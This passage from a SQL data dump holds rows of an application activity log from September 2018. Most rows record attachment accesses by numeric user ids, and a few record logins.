23:28:21',NULL),(5799,2,'Attachment',288,'2018-09-04 23:28:21','2018-09-04 23:28:21',NULL),(5800,2,'Attachment',266,'2018-09-04 23:28:21','2018-09-04 23:28:21',NULL),(5801,2,'Attachment',180,'2018-09-04 23:28:21','2018-09-04 23:28:21',NULL),(5802,2,'Attachment',107,'2018-09-04 23:28:21','2018-09-04 23:28:21',NULL),(5803,2,'Attachment',69,'2018-09-04 23:28:22','2018-09-04 23:28:22',NULL),(5804,2,'Attachment',152,'2018-09-04 23:28:22','2018-09-04 23:28:22',NULL),(5805,2,'Attachment',105,'2018-09-04 23:28:22','2018-09-04 23:28:22',NULL),(5806,2,'Attachment',253,'2018-09-04 23:28:36','2018-09-04 23:28:36',NULL),(5807,2,'Attachment',254,'2018-09-04 23:28:37','2018-09-04 23:28:37',NULL),(5808,2,'Attachment',255,'2018-09-04 23:28:37','2018-09-04 23:28:37',NULL),(5809,2,'Attachment',256,'2018-09-04 23:28:37','2018-09-04 23:28:37',NULL),(5810,2,'Attachment',252,'2018-09-05 10:22:52','2018-09-05 10:22:52',NULL),(5811,2,'Attachment',266,'2018-09-05 10:22:52','2018-09-05 10:22:52',NULL),(5812,2,'Attachment',180,'2018-09-05 10:22:52','2018-09-05 10:22:52',NULL),(5813,2,'Attachment',181,'2018-09-05 10:22:52','2018-09-05 10:22:52',NULL),(5814,2,'Attachment',288,'2018-09-05 10:22:52','2018-09-05 10:22:52',NULL),(5815,2,'Attachment',152,'2018-09-05 10:22:52','2018-09-05 10:22:52',NULL),(5816,2,'Attachment',107,'2018-09-05 10:22:52','2018-09-05 10:22:52',NULL),(5817,2,'Attachment',69,'2018-09-05 10:22:53','2018-09-05 10:22:53',NULL),(5818,2,'Attachment',105,'2018-09-05 10:22:53','2018-09-05 10:22:53',NULL),(5819,2,'Attachment',152,'2018-09-05 10:35:24','2018-09-05 10:35:24',NULL),(5820,2,'Attachment',252,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5821,2,'Attachment',288,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5822,2,'Attachment',266,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5823,2,'Attachment',105,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5824,2,'Attachment',107,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5825,2,'Attachment',181,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5826,2,'Attachment',180,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5827,2,'Attachment',69,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5828,2,'Attachment',152,'2018-09-05 13:42:23','2018-09-05 13:42:23',NULL),(5829,2,'Attachment',252,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5830,2,'Attachment',180,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5831,2,'Attachment',288,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5832,2,'Attachment',181,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5833,2,'Attachment',266,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5834,2,'Attachment',152,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5835,2,'Attachment',107,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5836,2,'Attachment',69,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5837,2,'Attachment',105,'2018-09-05 13:43:25','2018-09-05 13:43:25',NULL),(5838,2,'Attachment',46,'2018-09-05 13:43:29','2018-09-05 13:43:29',NULL),(5839,2,'Attachment',44,'2018-09-05 13:43:29','2018-09-05 13:43:29',NULL),(5840,2,'Attachment',45,'2018-09-05 13:43:29','2018-09-05 13:43:29',NULL),(5841,2,'Attachment',42,'2018-09-05 13:43:29','2018-09-05 13:43:29',NULL),(5842,2,'Attachment',41,'2018-09-05 13:43:29','2018-09-05 13:43:29',NULL),(5843,2,'Attachment',43,'2018-09-05 13:43:29','2018-09-05 13:43:29',NULL),(5844,2,'Attachment',47,'2018-09-05 13:43:30','2018-09-05 13:43:30',NULL),(5845,2,'Attachment',57,'2018-09-05 13:50:01','2018-09-05 13:50:01',NULL),(5846,2,'Attachment',174,'2018-09-05 13:50:01','2018-09-05 13:50:01',NULL),(5847,2,'Attachment',178,'2018-09-05 13:50:01','2018-09-05 13:50:01',NULL),(5848,2,'Attachment',40,'2018-09-05 13:50:47','2018-09-05 13:50:47',NULL),(5849,2,'Attachment',9,'2018-09-05 13:50:47','2018-09-05 13:50:47',NULL),(5850,2,'Attachment',29,'2018-09-05 13:51:36','2018-09-05 13:51:36',NULL),(5851,2,'Attachment',14,'2018-09-05 13:51:36','2018-09-05 13:51:36',NULL),(5852,2,'Attachment',36,'2018-09-05 13:51:36','2018-09-05 13:51:36',NULL),(5853,2,'Attachment',38,'2018-09-05 13:51:45','2018-09-05 13:51:45',NULL),(5854,2,'Attachment',216,'2018-09-05 13:51:45','2018-09-05 13:51:45',NULL),(5855,2,'Attachment',28,'2018-09-05 13:51:50','2018-09-05 13:51:50',NULL),(5856,2,'Attachment',294,'2018-09-05 13:53:17','2018-09-05 13:53:17',NULL),(5857,2,'Attachment',50,'2018-09-05 13:53:17','2018-09-05 13:53:17',NULL),(5858,2,'Attachment',280,'2018-09-05 13:53:17','2018-09-05 13:53:17',NULL),(5859,2,'Attachment',290,'2018-09-05 13:53:17','2018-09-05 13:53:17',NULL),(5860,2,'Attachment',49,'2018-09-05 13:53:18','2018-09-05 13:53:18',NULL),(5861,2,'Attachment',274,'2018-09-05 13:53:18','2018-09-05 13:53:18',NULL),(5862,2,'Attachment',277,'2018-09-05 13:53:28','2018-09-05 13:53:28',NULL),(5863,2,'Attachment',288,'2018-09-05 14:04:16','2018-09-05 14:04:16',NULL),(5864,2,'Attachment',252,'2018-09-05 14:04:16','2018-09-05 14:04:16',NULL),(5865,2,'Attachment',266,'2018-09-05 14:04:16','2018-09-05 14:04:16',NULL),(5866,2,'Attachment',105,'2018-09-05 14:04:16','2018-09-05 14:04:16',NULL),(5867,2,'Attachment',107,'2018-09-05 14:04:16','2018-09-05 14:04:16',NULL),(5868,2,'Attachment',181,'2018-09-05 14:04:17','2018-09-05 14:04:17',NULL),(5869,2,'Attachment',180,'2018-09-05 14:04:17','2018-09-05 14:04:17',NULL),(5870,2,'Attachment',69,'2018-09-05 14:04:17','2018-09-05 14:04:17',NULL),(5871,2,'Attachment',152,'2018-09-05 14:04:17','2018-09-05 14:04:17',NULL),(5872,2,'Attachment',252,'2018-09-05 14:33:01','2018-09-05 14:33:01',NULL),(5873,2,'Attachment',252,'2018-09-05 14:33:02','2018-09-05 14:33:02',NULL),(5874,2,'Attachment',266,'2018-09-05 14:33:03','2018-09-05 14:33:03',NULL),(5875,2,'Attachment',288,'2018-09-05 14:33:03','2018-09-05 14:33:03',NULL),(5876,2,'Attachment',180,'2018-09-05 14:33:03','2018-09-05 14:33:03',NULL),(5877,2,'Attachment',181,'2018-09-05 14:33:03','2018-09-05 14:33:03',NULL),(5878,2,'Attachment',152,'2018-09-05 14:33:03','2018-09-05 14:33:03',NULL),(5879,2,'Attachment',69,'2018-09-05 14:33:03','2018-09-05 14:33:03',NULL),(5880,2,'Attachment',105,'2018-09-05 14:33:03','2018-09-05 14:33:03',NULL),(5881,2,'Attachment',107,'2018-09-05 14:33:04','2018-09-05 14:33:04',NULL),(5882,1,'Login',1,'2018-09-05 14:33:45','2018-09-05 14:33:45',NULL),(5883,2,'Attachment',288,'2018-09-06 17:54:14','2018-09-06 17:54:14',NULL),(5884,2,'Attachment',266,'2018-09-06 17:54:14','2018-09-06 17:54:14',NULL),(5885,2,'Attachment',181,'2018-09-06 17:54:14','2018-09-06 17:54:14',NULL),(5886,2,'Attachment',252,'2018-09-06 17:54:14','2018-09-06 17:54:14',NULL),(5887,2,'Attachment',180,'2018-09-06 17:54:14','2018-09-06 17:54:14',NULL),(5888,2,'Attachment',107,'2018-09-06 17:54:15','2018-09-06 17:54:15',NULL),(5889,2,'Attachment',152,'2018-09-06 17:54:16','2018-09-06 17:54:16',NULL),(5890,2,'Attachment',69,'2018-09-06 17:54:16','2018-09-06 17:54:16',NULL),(5891,2,'Attachment',105,'2018-09-06 17:54:16','2018-09-06 17:54:16',NULL),(5892,2,'Attachment',252,'2018-09-06 17:58:43','2018-09-06 17:58:43',NULL),(5893,2,'Attachment',266,'2018-09-06 17:58:43','2018-09-06 17:58:43',NULL),(5894,2,'Attachment',152,'2018-09-06 17:58:43','2018-09-06 17:58:43',NULL),(5895,2,'Attachment',105,'2018-09-06 17:58:43','2018-09-06 17:58:43',NULL),(5896,2,'Attachment',152,'2018-09-06 17:58:53','2018-09-06 17:58:53',NULL),(5897,2,'Attachment',105,'2018-09-06 17:58:53','2018-09-06 17:58:53',NULL),(5898,2,'Attachment',57,'2018-09-06 17:58:55','2018-09-06 17:58:55',NULL),(5899,2,'Attachment',174,'2018-09-06 17:58:55','2018-09-06 17:58:55',NULL),(5900,2,'Attachment',178,'2018-09-06 17:58:55','2018-09-06 17:58:55',NULL),(5901,2,'Attachment',252,'2018-09-06 18:17:58','2018-09-06 18:17:58',NULL),(5902,2,'Attachment',266,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5903,2,'Attachment',288,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5904,2,'Attachment',180,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5905,2,'Attachment',152,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5906,2,'Attachment',181,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5907,2,'Attachment',69,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5908,2,'Attachment',105,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5909,2,'Attachment',107,'2018-09-06 18:17:59','2018-09-06 18:17:59',NULL),(5910,2,'Attachment',252,'2018-09-07 05:20:33','2018-09-07 05:20:33',NULL),(5911,2,'Attachment',266,'2018-09-07 05:20:34','2018-09-07 05:20:34',NULL),(5912,2,'Attachment',180,'2018-09-07 05:20:34','2018-09-07 05:20:34',NULL),(5913,2,'Attachment',288,'2018-09-07 05:20:34','2018-09-07 05:20:34',NULL),(5914,2,'Attachment',152,'2018-09-07 05:20:34','2018-09-07 05:20:34',NULL),(5915,2,'Attachment',181,'2018-09-07 05:20:34','2018-09-07 05:20:34',NULL),(5916,2,'Attachment',69,'2018-09-07 05:20:34','2018-09-07 05:20:34',NULL),(5917,2,'Attachment',105,'2018-09-07 05:20:34','2018-09-07 05:20:34',NULL),(5918,2,'Attachment',107,'2018-09-07 05:20:35','2018-09-07 05:20:35',NULL),(5919,10,'Attachment',181,'2018-09-07 07:45:13','2018-09-07 07:45:13',NULL),(5920,10,'Attachment',180,'2018-09-07 07:45:13','2018-09-07 07:45:13',NULL),(5921,10,'Attachment',266,'2018-09-07 07:45:13','2018-09-07 07:45:13',NULL),(5922,10,'Attachment',288,'2018-09-07 07:45:13','2018-09-07 07:45:13',NULL),(5923,10,'Attachment',69,'2018-09-07 07:45:13','2018-09-07 07:45:13',NULL),(5924,10,'Attachment',107,'2018-09-07 07:45:13','2018-09-07 07:45:13',NULL),(5925,2,'Attachment',252,'2018-09-07 10:52:44','2018-09-07 10:52:44',NULL),(5926,2,'Attachment',288,'2018-09-07 10:52:49','2018-09-07 10:52:49',NULL),(5927,2,'Attachment',180,'2018-09-07 10:52:49','2018-09-07 10:52:49',NULL),(5928,2,'Attachment',266,'2018-09-07 10:52:49','2018-09-07 10:52:49',NULL),(5929,2,'Attachment',152,'2018-09-07 10:52:49','2018-09-07 10:52:49',NULL),(5930,2,'Attachment',181,'2018-09-07 10:52:49','2018-09-07 10:52:49',NULL),(5931,2,'Attachment',69,'2018-09-07 10:52:52','2018-09-07 10:52:52',NULL),(5932,2,'Attachment',105,'2018-09-07 10:52:52','2018-09-07 10:52:52',NULL),(5933,2,'Attachment',107,'2018-09-07 10:52:53','2018-09-07 10:52:53',NULL),(5934,2,'Attachment',178,'2018-09-07 10:52:59','2018-09-07 10:52:59',NULL),(5935,2,'Attachment',174,'2018-09-07 10:52:59','2018-09-07 10:52:59',NULL),(5936,2,'Attachment',57,'2018-09-07 10:52:59','2018-09-07 10:52:59',NULL),(5937,2,'Attachment',36,'2018-09-07 10:53:05','2018-09-07 10:53:05',NULL),(5938,2,'Attachment',29,'2018-09-07 10:53:05','2018-09-07 10:53:05',NULL),(5939,2,'Attachment',14,'2018-09-07 10:53:05','2018-09-07 10:53:05',NULL),(5940,2,'Attachment',216,'2018-09-07 10:53:10','2018-09-07 10:53:10',NULL),(5941,2,'Attachment',38,'2018-09-07 10:53:10','2018-09-07 10:53:10',NULL),(5942,2,'Attachment',252,'2018-09-07 10:53:23','2018-09-07 10:53:23',NULL),(5943,2,'Attachment',288,'2018-09-07 10:53:23','2018-09-07 10:53:23',NULL),(5944,2,'Attachment',266,'2018-09-07 10:53:23','2018-09-07 10:53:23',NULL),(5945,2,'Attachment',152,'2018-09-07 10:53:23','2018-09-07 10:53:23',NULL),(5946,2,'Attachment',180,'2018-09-07 10:53:23','2018-09-07 10:53:23',NULL),(5947,2,'Attachment',181,'2018-09-07 10:53:23','2018-09-07 10:53:23',NULL),(5948,2,'Attachment',107,'2018-09-07 10:53:25','2018-09-07 10:53:25',NULL),(5949,2,'Attachment',69,'2018-09-07 10:53:25','2018-09-07 10:53:25',NULL),(5950,2,'Attachment',105,'2018-09-07 10:53:25','2018-09-07 10:53:25',NULL),(5951,2,'Attachment',14,'2018-09-07 10:53:46','2018-09-07 10:53:46',NULL),(5952,2,'Attachment',36,'2018-09-07 10:53:46','2018-09-07 10:53:46',NULL),(5953,2,'Attachment',29,'2018-09-07 10:53:46','2018-09-07 10:53:46',NULL),(5954,2,'Attachment',216,'2018-09-07 10:53:47','2018-09-07 10:53:47',NULL),(5955,2,'Attachment',178,'2018-09-07 10:53:47','2018-09-07 10:53:47',NULL),(5956,2,'Attachment',38,'2018-09-07 10:53:47','2018-09-07 10:53:47',NULL),(5957,2,'Attachment',28,'2018-09-07 10:53:48','2018-09-07 10:53:48',NULL),(5958,2,'Attachment',57,'2018-09-07 10:53:48','2018-09-07 10:53:48',NULL),(5959,2,'Attachment',49,'2018-09-07 10:53:49','2018-09-07 10:53:49',NULL),(5960,2,'Attachment',294,'2018-09-07 10:53:49','2018-09-07 10:53:49',NULL),(5961,2,'Attachment',274,'2018-09-07 10:53:49','2018-09-07 10:53:49',NULL),(5962,2,'Attachment',50,'2018-09-07 10:53:49','2018-09-07 10:53:49',NULL),(5963,2,'Attachment',290,'2018-09-07 10:53:49','2018-09-07 10:53:49',NULL),(5964,2,'Attachment',280,'2018-09-07 10:53:49','2018-09-07 10:53:49',NULL),(5965,2,'Attachment',41,'2018-09-07 10:53:51','2018-09-07 10:53:51',NULL),(5966,2,'Attachment',42,'2018-09-07 10:53:52','2018-09-07 10:53:52',NULL),(5967,2,'Attachment',43,'2018-09-07 10:53:54','2018-09-07 10:53:54',NULL),(5968,2,'Attachment',44,'2018-09-07 10:53:56','2018-09-07 10:53:56',NULL),(5969,2,'Attachment',45,'2018-09-07 10:53:57','2018-09-07 10:53:57',NULL),(5970,2,'Attachment',47,'2018-09-07 10:53:58','2018-09-07 10:53:58',NULL),(5971,2,'Attachment',115,'2018-09-07 12:35:29','2018-09-07 12:35:29',NULL),(5972,15,'Attachment',252,'2018-09-07 12:38:42','2018-09-07 12:38:42',NULL),(5973,15,'Attachment',288,'2018-09-07 12:38:42','2018-09-07 12:38:42',NULL),(5974,15,'Attachment',180,'2018-09-07 12:38:42','2018-09-07 12:38:42',NULL),(5975,15,'Attachment',152,'2018-09-07 12:38:42','2018-09-07 12:38:42',NULL),(5976,15,'Attachment',266,'2018-09-07 12:38:43','2018-09-07 12:38:43',NULL),(5977,15,'Attachment',181,'2018-09-07 12:38:43','2018-09-07 12:38:43',NULL),(5978,15,'Attachment',107,'2018-09-07 12:38:44','2018-09-07 12:38:44',NULL),(5979,15,'Attachment',69,'2018-09-07 12:38:44','2018-09-07 12:38:44',NULL),(5980,15,'Attachment',105,'2018-09-07 12:38:44','2018-09-07 12:38:44',NULL),(5981,2,'Attachment',252,'2018-09-08 11:51:30','2018-09-08 11:51:30',NULL),(5982,2,'Attachment',288,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5983,2,'Attachment',266,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5984,2,'Attachment',181,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5985,2,'Attachment',180,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5986,2,'Attachment',152,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5987,2,'Attachment',69,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5988,2,'Attachment',107,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5989,2,'Attachment',105,'2018-09-08 11:51:31','2018-09-08 11:51:31',NULL),(5990,2,'Attachment',41,'2018-09-08 11:51:42','2018-09-08 11:51:42',NULL),(5991,2,'Attachment',45,'2018-09-08 11:51:42','2018-09-08 11:51:42',NULL),(5992,2,'Attachment',44,'2018-09-08 11:51:42','2018-09-08 11:51:42',NULL),(5993,2,'Attachment',43,'2018-09-08 11:51:42','2018-09-08 11:51:42',NULL),(5994,2,'Attachment',42,'2018-09-08 11:51:42','2018-09-08 11:51:42',NULL),(5995,2,'Attachment',46,'2018-09-08 11:51:42','2018-09-08 11:51:42',NULL),(5996,2,'Attachment',47,'2018-09-08 11:51:42','2018-09-08 11:51:42',NULL),(5997,2,'Attachment',294,'2018-09-08 12:04:14','2018-09-08 12:04:14',NULL),(5998,2,'Attachment',49,'2018-09-08 12:04:14','2018-09-08 12:04:14',NULL),(5999,2,'Attachment',274,'2018-09-08 12:04:14','2018-09-08 12:04:14',NULL),(6000,2,'Attachment',50,'2018-09-08 12:04:14','2018-09-08 12:04:14',NULL),(6001,2,'Attachment',290,'2018-09-08 12:04:14','2018-09-08 12:04:14',NULL),(6002,2,'Attachment',280,'2018-09-08 12:04:14','2018-09-08 12:04:14',NULL),(6003,2,'Attachment',278,'2018-09-08 13:23:52','2018-09-08 13:23:52',NULL),(6004,2,'Attachment',252,'2018-09-08 20:30:03','2018-09-08 20:30:03',NULL),(6005,2,'Attachment',288,'2018-09-08 20:30:03','2018-09-08 20:30:03',NULL),(6006,2,'Attachment',152,'2018-09-08 20:30:03','2018-09-08 20:30:03',NULL),(6007,2,'Attachment',266,'2018-09-08 20:30:03','2018-09-08 20:30:03',NULL),(6008,2,'Attachment',180,'2018-09-08 20:30:03','2018-09-08 20:30:03',NULL),(6009,2,'Attachment',181,'2018-09-08 20:30:03','2018-09-08 20:30:03',NULL),(6010,2,'Attachment',69,'2018-09-08 20:30:04','2018-09-08 20:30:04',NULL),(6011,2,'Attachment',105,'2018-09-08 20:30:04','2018-09-08 20:30:04',NULL),(6012,2,'Attachment',107,'2018-09-08 20:30:04','2018-09-08 20:30:04',NULL),(6013,2,'Attachment',252,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6014,2,'Attachment',288,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6015,2,'Attachment',180,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6016,2,'Attachment',152,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6017,2,'Attachment',181,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6018,2,'Attachment',266,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6019,2,'Attachment',69,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6020,2,'Attachment',107,'2018-09-09 10:18:47','2018-09-09 10:18:47',NULL),(6021,2,'Attachment',105,'2018-09-09 10:18:48','2018-09-09 10:18:48',NULL),(6022,1,'Login',1,'2018-09-09 10:19:05','2018-09-09 10:19:05',NULL),(6023,2,'Attachment',252,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6024,2,'Attachment',288,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6025,2,'Attachment',152,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6026,2,'Attachment',266,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6027,2,'Attachment',181,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6028,2,'Attachment',180,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6029,2,'Attachment',69,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6030,2,'Attachment',107,'2018-09-09 11:20:58','2018-09-09 11:20:58',NULL),(6031,2,'Attachment',105,'2018-09-09 11:20:59','2018-09-09 11:20:59',NULL),(6032,1,'Login',1,'2018-09-09 11:22:07','2018-09-09 11:22:07',NULL),(6033,1,'Attachment',304,'2018-09-09 11:27:57','2018-09-09 11:27:57',NULL),(6034,2,'Attachment',252,'2018-09-09 14:09:17','2018-09-09 14:09:17',NULL),(6035,2,'Attachment',288,'2018-09-09 14:09:17','2018-09-09 14:09:17',NULL),(6036,2,'Attachment',266,'2018-09-09 14:09:17','2018-09-09 14:09:17',NULL),(6037,2,'Attachment',105,'2018-09-09 14:09:18','2018-09-09 14:09:18',NULL),(6038,1,'Login',1,'2018-09-09 14:09:35','2018-09-09 14:09:35',NULL),(6039,1,'Attachment',309,'2018-09-09 14:13:45','2018-09-09 14:13:45',NULL),(6040,1,'Attachment',310,'2018-09-09 14:17:17','2018-09-09 14:17:17',NULL),(6041,1,'Attachment',252,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6042,1,'Attachment',288,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6043,1,'Attachment',152,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6044,1,'Attachment',181,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6045,1,'Attachment',180,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6046,1,'Attachment',266,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6047,1,'Attachment',107,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6048,1,'Attachment',69,'2018-09-09 15:53:48','2018-09-09 15:53:48',NULL),(6049,1,'Attachment',105,'2018-09-09 15:53:49','2018-09-09 15:53:49',NULL),(6050,1,'Attachment',205,'2018-09-10 09:33:47','2018-09-10 09:33:47',NULL),(6051,1,'Attachment',206,'2018-09-10 09:33:47','2018-09-10 09:33:47',NULL),(6052,1,'Attachment',208,'2018-09-10 09:33:47','2018-09-10 09:33:47',NULL),(6053,1,'Attachment',207,'2018-09-10 09:33:47','2018-09-10 09:33:47',NULL),(6054,1,'Attachment',204,'2018-09-10 09:33:47','2018-09-10 09:33:47',NULL),(6055,1,'Attachment',203,'2018-09-10 09:33:47','2018-09-10 09:33:47',NULL),(6056,1,'Attachment',209,'2018-09-10 09:33:49','2018-09-10 09:33:49',NULL),(6057,1,'Attachment',210,'2018-09-10 09:33:49','2018-09-10 09:33:49',NULL),(6058,1,'Attachment',211,'2018-09-10 09:33:50','2018-09-10 09:33:50',NULL),(6059,1,'Attachment',213,'2018-09-10 09:33:50','2018-09-10 09:33:50',NULL),(6060,1,'Attachment',212,'2018-09-10 09:33:51','2018-09-10 09:33:51',NULL),(6061,1,'Attachment',214,'2018-09-10 09:33:52','2018-09-10 09:33:52',NULL),(6062,1,'Attachment',106,'2018-09-10 09:33:55','2018-09-10 09:33:55',NULL),(6063,1,'Attachment',203,'2018-09-10 09:33:59','2018-09-10 09:33:59',NULL),(6064,1,'Attachment',212,'2018-09-10 09:33:59','2018-09-10 09:33:59',NULL),(6065,1,'Attachment',252,'2018-09-10 09:34:02','2018-09-10 09:34:02',NULL),(6066,2,'Attachment',266,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6067,2,'Attachment',288,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6068,2,'Attachment',181,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6069,2,'Attachment',252,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6070,2,'Attachment',180,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6071,2,'Attachment',105,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6072,2,'Attachment',69,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6073,2,'Attachment',152,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6074,2,'Attachment',107,'2018-09-10 09:52:27','2018-09-10 09:52:27',NULL),(6075,2,'Attachment',252,'2018-09-10 18:07:34','2018-09-10 18:07:34',NULL),(6076,2,'Attachment',180,'2018-09-10 18:07:34','2018-09-10 18:07:34',NULL),(6077,2,'Attachment',288,'2018-09-10 18:07:34','2018-09-10 18:07:34',NULL),(6078,2,'Attachment',181,'2018-09-10 18:07:34','2018-09-10 18:07:34',NULL),(6079,2,'Attachment',266,'2018-09-10 18:07:34','2018-09-10 18:07:34',NULL),(6080,2,'Attachment',152,'2018-09-10 18:07:34','2018-09-10 18:07:34',NULL),(6081,2,'Attachment',107,'2018-09-10 18:07:35','2018-09-10 18:07:35',NULL),(6082,2,'Attachment',69,'2018-09-10 18:07:36','2018-09-10 18:07:36',NULL),(6083,2,'Attachment',105,'2018-09-10 18:07:36','2018-09-10 18:07:36',NULL),(6084,1,'Login',1,'2018-09-10 18:08:00','2018-09-10 18:08:00',NULL),(6085,1,'Attachment',252,'2018-09-10 18:08:04','2018-09-10 18:08:04',NULL),(6086,1,'Attachment',181,'2018-09-10 18:08:04','2018-09-10 18:08:04',NULL),(6087,1,'Attachment',152,'2018-09-10 18:08:04','2018-09-10 18:08:04',NULL),(6088,1,'Attachment',266,'2018-09-10 18:08:04','2018-09-10 18:08:04',NULL),(6089,1,'Attachment',105,'2018-09-10 18:08:05','2018-09-10 18:08:05',NULL),(6090,1,'Attachment',106,'2018-09-10 18:08:21','2018-09-10 18:08:21',NULL),(6091,2,'Attachment',180,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6092,2,'Attachment',252,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6093,2,'Attachment',181,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6094,2,'Attachment',288,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6095,2,'Attachment',266,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6096,2,'Attachment',152,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6097,2,'Attachment',69,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6098,2,'Attachment',105,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6099,2,'Attachment',107,'2018-09-10 18:10:11','2018-09-10 18:10:11',NULL),(6100,1,'Attachment',313,'2018-09-10 18:12:35','2018-09-10 18:12:35',NULL),(6101,1,'Attachment',312,'2018-09-10 18:12:45','2018-09-10 18:12:45',NULL),(6102,1,'Attachment',312,'2018-09-10 18:13:14','2018-09-10 18:13:14',NULL),(6103,2,'Attachment',312,'2018-09-10 18:13:46','2018-09-10 18:13:46',NULL),(6104,2,'Attachment',312,'2018-09-10 18:14:01','2018-09-10 18:14:01',NULL),(6105,2,'Attachment',312,'2018-09-10 18:14:12','2018-09-10 18:14:12',NULL),(6106,2,'Attachment',312,'2018-09-10 18:14:13','2018-09-10 18:14:13',NULL),(6107,2,'Attachment',312,'2018-09-10 18:14:20','2018-09-10 18:14:20',NULL),(6108,2,'Attachment',312,'2018-09-10 18:17:46','2018-09-10 18:17:46',NULL),(6109,2,'Attachment',312,'2018-09-10 18:19:13','2018-09-10 18:19:13',NULL),(6110,2,'Attachment',312,'2018-09-10 18:19:18','2018-09-10 18:19:18',NULL),(6111,2,'Attachment',312,'2018-09-10 18:23:41','2018-09-10 18:23:41',NULL),(6112,2,'Attachment',312,'2018-09-10 18:24:02','2018-09-10 18:24:02',NULL),(6113,2,'Attachment',312,'2018-09-10 20:25:46','2018-09-10 20:25:46',NULL),(6114,2,'Attachment',312,'2018-09-10 20:25:46','2018-09-10 20:25:46',NULL),(6115,2,'Attachment',312,'2018-09-10 22:07:35','2018-09-10 22:07:35',NULL),(6116,2,'Attachment',312,'2018-09-10 22:07:36','2018-09-10 22:07:36',NULL),(6117,2,'Attachment',312,'2018-09-10 22:13:22','2018-09-10 22:13:22',NULL),(6118,2,'Attachment',312,'2018-09-10 22:13:23','2018-09-10 22:13:23',NULL),(6119,2,'Attachment',312,'2018-09-11 00:08:21','2018-09-11 00:08:21',NULL),(6120,2,'Attachment',252,'2018-09-11 01:07:38','2018-09-11 01:07:38',NULL),(6121,2,'Attachment',288,'2018-09-11 01:07:38','2018-09-11 01:07:38',NULL),(6122,2,'Attachment',180,'2018-09-11 01:07:38','2018-09-11 01:07:38',NULL),(6123,2,'Attachment',266,'2018-09-11 01:07:38','2018-09-11 01:07:38',NULL),(6124,2,'Attachment',181,'2018-09-11 01:07:38','2018-09-11 01:07:38',NULL),(6125,2,'Attachment',152,'2018-09-11 01:07:38','2018-09-11 01:07:38',NULL),(6126,2,'Attachment',69,'2018-09-11 01:07:39','2018-09-11 01:07:39',NULL),(6127,2,'Attachment',313,'2018-09-11 01:07:39','2018-09-11 01:07:39',NULL),(6128,2,'Attachment',252,'2018-09-11 10:51:36','2018-09-11 10:51:36',NULL),(6129,2,'Attachment',288,'2018-09-11 10:51:37','2018-09-11 10:51:37',NULL),(6130,2,'Attachment',266,'2018-09-11 10:51:37','2018-09-11 10:51:37',NULL),(6131,2,'Attachment',313,'2018-09-11 10:51:37','2018-09-11 